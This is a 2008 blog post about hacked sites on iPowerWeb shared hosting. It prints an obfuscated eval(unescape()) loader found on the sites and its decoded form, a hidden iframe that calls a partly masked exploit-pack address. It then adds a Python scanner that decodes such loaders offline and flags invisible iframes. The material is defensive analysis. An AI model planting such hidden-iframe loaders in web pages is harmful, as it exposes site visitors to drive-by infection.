Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may involve a DNS hack as well; I'm not sure that's the case, but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all resolves to IPs on *.static.eigbox.net, which links to BIZLAND.

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you; it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33, which APNIC claims to be hostfresh.com out of Hong Kong, which in turn has a San Francisco mailbox according to their website.
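The eval(unescape("%XX%XX...")) wrapper above is a simple percent-encoding of the real loader, so it can be decoded and triaged offline without ever loading the page. The following is an added example, not code from the original post: a small Python scanner that reproduces JavaScript's unescape() (both %XX and %uXXXX forms), pulls the payload out of the eval(unescape()) wrapper, and flags any iframe it finds whose style or dimensions make it invisible. The sample payload is constructed to mirror the decoded snippet, with malicious.example as a placeholder host rather than the live address.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the decoded snippet in the post; the host is a
# placeholder, not the real one. document.write() injects an invisible iframe.
HIDDEN_IFRAME_JS = (
    "window.status='Done';document.write('<iframe name=f2f8f656791 "
    "src=\\'http://malicious.example/gpack/index.php?'+Math.round(Math.random()*74880)+'2\\' "
    "width=480 height=156 style=\\'display: none\\'></iframe>')"
)

def percent_encode_all(text):
    """Encode every character as %XX, the way the injected loader was encoded."""
    return "".join("%%%02x" % b for b in text.encode("latin-1"))

# The obfuscated form as it would appear in an infected page.
OBFUSCATED = 'eval(unescape("%s"));' % percent_encode_all(HIDDEN_IFRAME_JS)

def js_unescape(text):
    """Mimic JavaScript's unescape(): %uXXXX gives a UTF-16 unit, %XX a byte."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")

EVAL_UNESCAPE = re.compile(r"""eval\s*\(\s*unescape\s*\(\s*(["'])(.*?)\1\s*\)\s*\)""", re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
# src may be wrapped in backslash-escaped quotes inside the document.write string.
SRC = re.compile(r"""src\s*=\s*\\?["']?(https?://[^'"\\\s]+)""", re.I)

def is_hidden(tag):
    """An iframe the visitor cannot see is the classic drive-by loader sign."""
    if re.search(r"display\s*:\s*none", tag, re.I):
        return True
    dims = re.findall(r"""\b(?:width|height)\s*=\s*\\?['"]?(\d+)""", tag, re.I)
    return bool(dims) and all(int(d) <= 1 for d in dims)

def scan(script):
    """Return (src, hidden) for every iframe inside eval(unescape()) payloads."""
    findings = []
    for _, encoded in EVAL_UNESCAPE.findall(script):
        decoded = js_unescape(encoded)
        for tag in IFRAME.findall(decoded):
            m = SRC.search(tag)
            findings.append((m.group(1) if m else None, is_hidden(tag)))
    return findings

if __name__ == "__main__":
    for src, hidden in scan(OBFUSCATED):
        print("iframe src=%s hidden=%s" % (src, hidden))
```

Running the scanner over a site's served HTML gives the remote host to block and report without executing any of the script.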

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...